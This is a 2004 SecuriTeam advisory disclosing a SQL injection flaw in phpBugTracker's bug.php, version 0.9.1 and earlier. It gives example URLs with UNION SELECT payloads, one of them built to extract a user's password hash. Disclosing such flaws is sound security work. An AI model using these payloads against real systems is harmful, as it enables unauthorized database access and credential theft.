Date: 16 Nov 2004 18:29:19 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] phpBugTracker bug.php SQL Injection
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phpBugTracker bug.php SQL Injection
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SUMMARY
<http://phpbt.sourceforge.net/> phpBugTracker is "meant to be a
replacement for Bugzilla (one day)".
Due to improper sanitation of the 'bugid' variable passed through the
bug.php by the phpBugTracker product a user can insert arbitrary SQL
statements into the existing statements used by the product.
DETAILS
Vulnerable Systems:
* PHP Bug Traq version 0.9.1 and prior
Examples:
The following examples will trigger the vulnerability:
http://vulnerable/bugs/bug.php?op=viewvotes&bugid=1 union select
1,user_password,3 where user_id='2'/*
http://vulnerable/bugs/bug.php?op=add&project=0%20union%20select%201
http://vulnerable/bugs/bug.php?op=add&project=0%20union%20select%201
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> jessica
soules.
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